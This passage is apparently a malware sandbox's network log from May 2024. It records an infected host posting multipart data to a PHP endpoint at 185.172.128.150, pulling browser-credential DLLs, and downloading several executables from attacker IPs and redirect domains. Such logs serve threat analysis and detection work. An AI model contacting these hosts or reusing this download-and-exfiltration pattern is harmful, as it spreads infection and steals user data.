Content-Type: application/x-msdos-program
-
Remote address:20.157.87.45:80RequestPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
ResponseHTTP/1.1 200 OK
content-length: 256
content-type: text/html; charset=utf-8
x-whom: Ioloweb5
date: Sun, 12 May 2024 04:41:08 GMT
set-cookie: SERVERID=svc5; path=/
connection: close
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK
Host: 185.172.128.150
Content-Length: 217
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 156
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE
Host: 185.172.128.150
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH
Host: 185.172.128.150
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 5416
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFH
Host: 185.172.128.150
Content-Length: 4819
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
ETag: "10e436-5e7eeebed8d80"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC
Host: 185.172.128.150
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJ
Host: 185.172.128.150
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "a7550-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "94750-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDB
Host: 185.172.128.150
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC
Host: 185.172.128.150
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIIEBAAFBFBAKFIDBAFH
Host: 185.172.128.150
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHC
Host: 185.172.128.150
Content-Length: 580923
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC
Host: 185.172.128.150
Content-Length: 15735
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDG
Host: 185.172.128.150
Content-Length: 302743
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBA
Host: 185.172.128.150
Content-Length: 15731
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address: 185.172.128.150:80
Request
POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAK
Host: 185.172.128.150
Content-Length: 102207
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address: 185.172.128.150:80
Request
POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDH
Host: 185.172.128.150
Content-Length: 270
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address: 8.8.8.8:53
Request
yip.su IN A
Response
yip.su IN A 104.21.79.77
yip.su IN A 172.67.169.89
-
Remote address: 8.8.8.8:53
Request
77.79.21.104.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
realdeepai.org IN A
Response
realdeepai.org IN A 172.67.193.79
realdeepai.org IN A 104.21.90.14
-
Remote address: 8.8.8.8:53
Request
firstfirecar.com IN A
Response
firstfirecar.com IN A 104.21.60.76
firstfirecar.com IN A 172.67.193.220
-
Remote address: 8.8.8.8:53
Request
79.193.67.172.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
76.60.21.104.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
api.myip.com IN A
Response
api.myip.com IN A 104.26.8.59
api.myip.com IN A 104.26.9.59
api.myip.com IN A 172.67.75.163
-
Remote address: 8.8.8.8:53
Request
download.iolo.net IN A
Response
download.iolo.net IN CNAME iolo0.b-cdn.net
iolo0.b-cdn.net IN A 143.244.56.51
-
Remote address: 8.8.8.8:53
Request
51.56.244.143.in-addr.arpa IN PTR
Response
51.56.244.143.in-addr.arpa IN PTR 143-244-56-51 bunnyinfranet
-
Remote address: 8.8.8.8:53
Request
51.56.244.143.in-addr.arpa IN PTR
-
Remote address: 104.20.3.235:443
Request
GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Sun, 12 May 2024 03:22:28 GMT
Server: cloudflare
CF-RAY: 8827bc1fbe7f79c1-LHR
-
Remote address: 104.21.79.77:443
Request
GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
memory: 0.36199188232421875
expires: Sun, 12 May 2024 04:41:10 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Sun, 12 May 2024 04:28:28 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9GTNqwZrfH956H96gE32mXHQhNWcVuXYrp5DLPfJj%2BXCW5Ej7kHS3%2FcGPv1qeGbQ5lp5XoCTLkjkFvNffk9y9yoqFUQ3BGSkhmWFzAdcrwMLUDYhNM3T%2BK4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc1fbcdb779a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 5.42.96.64:80
Request
GET /server/ww12/AppGate2103v01.exe HTTP/1.1
Host: 5.42.96.64
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:10 GMT
Content-Type: application/octet-stream
Content-Length: 1449760
Last-Modified: Fri, 10 May 2024 14:30:10 GMT
Connection: keep-alive
ETag: "663e2f72-161f20"
Accept-Ranges: bytes
-
Remote address: 5.42.96.78:80
Request
GET /files/setup.exe HTTP/1.1
Host: 5.42.96.78
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Fri, 10 May 2024 08:32:14 GMT
ETag: "63fa73-618155f6aed8b"
Accept-Ranges: bytes
Content-Length: 6552179
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
-
Remote address: 185.172.128.59:80
Request
GET /ISetup5.exe HTTP/1.1
Host: 185.172.128.59
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 12 May 2024 04:30:01 GMT
ETag: "60a01-6183a38e01c48"
Accept-Ranges: bytes
Content-Length: 395777
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address: 8.8.8.8:53
Request
1xst.ru IN A
Response
1xst.ru IN A 190.147.2.86
1xst.ru IN A 181.129.118.140
1xst.ru IN A 58.151.148.90
1xst.ru IN A 77.31.175.183
1xst.ru IN A 116.58.10.59
1xst.ru IN A 105.158.113.67
1xst.ru IN A 92.36.226.66
1xst.ru IN A 186.145.236.93
1xst.ru IN A 190.12.87.61
1xst.ru IN A 187.143.62.35
-
Remote address: 8.8.8.8:53
Request
64.96.42.5.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
124.31.21.104.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
26.56.192.85.in-addr.arpa IN PTR
Response
26.56.192.85.in-addr.arpa IN PTR somber-healthaezanetwork
-
Remote address: 8.8.8.8:53
Request
59.8.26.104.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
svc.iolo.com IN A
Response
svc.iolo.com IN A 20.157.87.45
-
Remote address: 8.8.8.8:53
Request
145.155.9.20.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
13.227.111.52.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
server15.realupdate.ru IN A
Response
server15.realupdate.ru IN A 185.82.216.96
-
Remote address: 8.8.8.8:53
Request
233.130.159.162.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
service-domain.xyz IN A
Response
service-domain.xyz IN A 3.80.150.121
-
Remote address: 8.8.8.8:53
Request
x1.c.lencr.org IN A
Response
x1.c.lencr.org IN CNAME crl.root-x1.letsencrypt.org.edgekey.net
crl.root-x1.letsencrypt.org.edgekey.net IN CNAME e8652.dscx.akamaiedge.net
e8652.dscx.akamaiedge.net IN A 23.55.97.11
-
Remote address: 8.8.8.8:53
Request
11.97.55.23.in-addr.arpa IN PTR
Response
11.97.55.23.in-addr.arpa IN PTR a23-55-97-11deploystaticakamaitechnologiescom
-
Remote address: 8.8.8.8:53
Request
ocsp.pki.goog IN A
Response
ocsp.pki.goog IN CNAME pki-goog.l.google.com
pki-goog.l.google.com IN A 142.250.187.195
-
Remote address: 8.8.8.8:53
Request
195.187.250.142.in-addr.arpa IN PTR
Response
195.187.250.142.in-addr.arpa IN PTR lhr25s33-in-f31e100net
-
Remote address: 8.8.8.8:53
Request
66.112.168.52.in-addr.arpa IN PTR
Response
-
Remote address: 5.42.96.78:80
Request
GET /files/setup.exe HTTP/1.1
Host: 5.42.96.78
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Fri, 10 May 2024 08:32:14 GMT
ETag: "63fa73-618155f6aed8b"
Accept-Ranges: bytes
Content-Length: 6552179
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
-
Remote address: 104.21.18.166:443
Request
GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive
Response
HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://firstfirecar.com/21dfe1441e91990f0eca04b138ef21be/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pjk3Dq5d4vmsDGtKcIEHXcanz2P%2FOZiyxziMlyfse9pqV%2BWeZ%2FyguxaJZZF41OssKfFXAVX5qXbKjWwxo1cVGI%2BCgT%2F7JqpHjHhI3nbFkUvGfymU1MkmaqIumPVdINKDx8%2BW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc22586a6408-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 172.67.193.79:443
Request
GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: realdeepai.org
Connection: Keep-Alive
Response
HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYbkfosYN6eDPM1KHNUQSuNBMrjnMgIN7622uwkxju6QSqZdokFGj2Or5sQ1QHpYuQA4EpanGSU75bg5qU8P%2FNAR10lvqRUIkJdGYYSKHoMrG7LAKR%2BnfNszgGMW%2FXq2DQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc2258b1949d-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 104.21.18.166:443
Request
GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive
Response
HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://firstfirecar.com/21dfe1441e91990f0eca04b138ef21be/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T57xCdjvJtjfuZLsuVI%2FxF02e0OKPlx%2F6WR3Alg%2B1ZNiYohfuIWE54jNZMWkrPKLzKXJzL1IVlHzI3P0DuxXNRQh42bP%2BUWGuzjj1zw0D6vHfRnYegbZ67hbiQlT%2BBM6iHZU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc225fbf63ea-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 172.67.193.79:443
Request
GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: realdeepai.org
Connection: Keep-Alive
Response
HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IbLnMX2ZMRJTL8jxy8LI0HX5P8VNmPXi%2FONKTtsTah7MET09%2BNAzvCSiLElt1R%2Bj8kjsalVKQ6RHGkOfSeI1XbGgXA9ISJhOXhxYqlQKUyr%2F0XjFU7bBZfh79mzWrEKfIw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc2258794922-LHR
alt-svc: h3=":443"; ma=86400
-
GET https://jonathantwo.com/21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exe
Process: installutil.exe
Remote address: 104.21.31.124:443
Request
GET /21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4323208
Connection: keep-alive
Last-Modified: Sun, 12 May 2024 00:31:31 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 845
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1GFqNTPhfBOCwjBJydX2o4yiYNeLpb5eJtMy33XAOd10EdSfIx3GVxEItbH2vzANZ5dkyUNGrFvNTwOVvc0msRsXfH7AJxXPhCSOXH2B7fbQdcjZ0HQrOHQFR97g8S75FG4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc242adadcb7-LHR
alt-svc: h3=":443"; ma=86400
-
GET https://jonathantwo.com/21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exe
Process: installutil.exe
Remote address: 104.21.31.124:443
Request
GET /21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4323208
Connection: keep-alive
Last-Modified: Sun, 12 May 2024 00:31:31 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 850
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ljoVRyN7xA23q6BwBE%2FomjZmRlT4zfCQXBUd4Xpn1MMDqdm5dj88C0XDiVvP0iYwgE5nlA%2F2SNmMo7K11JuErVIrPOgJnHTACh01ad52MMB838PsMczEXdKe4GZeSY%2FH14%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc2429647309-LHR
alt-svc: h3=":443"; ma=86400
-
GET https://firstfirecar.com/21dfe1441e91990f0eca04b138ef21be/baf14778c246e15550645e30ba78ce1c.exe
Process: installutil.exe
Remote address: 104.21.60.76:443
Request
GET /21dfe1441e91990f0eca04b138ef21be/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4323192
Connection: keep-alive
Last-Modified: Sun, 12 May 2024 00:31:42 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 992
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OMz1kYvriUpj%2F%2B30HeCQuzuaJLfmyhesn8HgWgDCmtsXrIIzKLad1UO71Ef9hNrEgdhMD58pd%2BsaZUbWCvAnuD%2BWF8w7u5uWDMMbLakf3qpv4%2BTwTcFrV8r7T%2BTAIIKbmpVA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc2a999f93f9-LHR
alt-svc: h3=":443"; ma=86400
-
GET https://firstfirecar.com/21dfe1441e91990f0eca04b138ef21be/baf14778c246e15550645e30ba78ce1c.exe
Process: installutil.exe
Remote address: 104.21.60.76:443
Request
GET /21dfe1441e91990f0eca04b138ef21be/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4323192
Connection: keep-alive
Last-Modified: Sun, 12 May 2024 00:31:42 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 992
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wyx8QaxM9CCxHBXgtA8eVKZTVdHZ3OzAEWL4wpdeW38rb0R%2BO8YxQ2xiBKaE5CCWBciXBtBgfzMF%2F2SI2FQaBisdGEUfm0gKPGQ5z6by8NSFgdQWRuozSlz5u%2FNLqKmO236T"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc2a99389556-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 190.147.2.86:80
Request
GET /tech/upd2.php HTTP/1.1
Host: 1xst.ru
Connection: Keep-Alive
-
Remote address: 190.147.2.86:80
Request
GET /tech/upd2.php HTTP/1.1
Host: 1xst.ru
Connection: Keep-Alive
-
Remote address: 85.192.56.26:80
Request
GET /api/bing_release.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Host: 85.192.56.26
Response
HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.90:80
Request
GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1
Host: 185.172.128.90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response
HTTP/1.0 500 Internal Server Error
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.228:80
Request
GET /ping.php?substr=five HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response
HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.172.128.59:80
Request
GET /syncUpd.exe HTTP/1.1
Host: 185.172.128.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response
HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 12 May 2024 04:30:01 GMT
ETag: "3b800-6183a38de5727"
Accept-Ranges: bytes
Content-Length: 243712
Content-Type: application/x-msdos-program
-
Remote address: 185.172.128.228:80
Request
GET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Response
HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
ETag: "4a4030-613b1bf118700"
Accept-Ranges: bytes
Content-Length: 4866096
Content-Type: application/x-msdos-program
-
Remote address: 20.157.87.45:80
Request
POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Response
HTTP/1.1 200 OK
content-length: 192
content-type: text/html; charset=utf-8
x-whom: Ioloweb7
date: Sun, 12 May 2024 04:41:24 GMT
set-cookie: SERVERID=svc7; path=/
connection: close
-
Remote address: 20.157.87.45:80
Request
POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Response
HTTP/1.1 200 OK
content-length: 256
content-type: text/html; charset=utf-8
x-whom: Ioloweb9
date: Sun, 12 May 2024 04:41:29 GMT
set-cookie: SERVERID=svc9; path=/
connection: close
-
Remote address: 20.157.87.45:80
Request
POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Response
HTTP/1.1 200 OK
content-length: 192
content-type: text/html; charset=utf-8
x-whom: Ioloweb7
date: Sun, 12 May 2024 04:41:32 GMT
set-cookie: SERVERID=svc7; path=/
connection: close
-
Remote address: 185.172.128.150:80
Request
POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJDHCFCBGIDGHJJKJJDG
Host: 185.172.128.150
Content-Length: 217
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 8.8.8.8:53
Request
stun1.l.google.com IN A
Response
stun1.l.google.com IN A 74.125.250.129
-
Remote address: 8.8.8.8:53
Request
carsalessystem.com IN A
Response
carsalessystem.com IN A 104.21.94.82
carsalessystem.com IN A 172.67.221.71
-
Remote address: 8.8.8.8:53
Request
82.94.21.104.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
ctldl.windowsupdate.com IN A
Response
ctldl.windowsupdate.com IN CNAME ctldl.windowsupdate.com.delivery.microsoft.com
ctldl.windowsupdate.com.delivery.microsoft.com IN CNAME wu-b-net.trafficmanager.net
wu-b-net.trafficmanager.net IN CNAME edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com IN A 217.20.56.99
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com IN A 217.20.56.36
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com IN A 217.20.58.98
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com IN A 217.20.56.35
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com IN A 217.20.58.100
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com IN A 217.20.58.101
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com IN A 217.20.58.99
-
Remote address: 8.8.8.8:53
Request
r3.o.lencr.org IN A
Response
r3.o.lencr.org IN CNAME o.lencr.edgesuite.net
o.lencr.edgesuite.net IN CNAME a1887.dscq.akamai.net
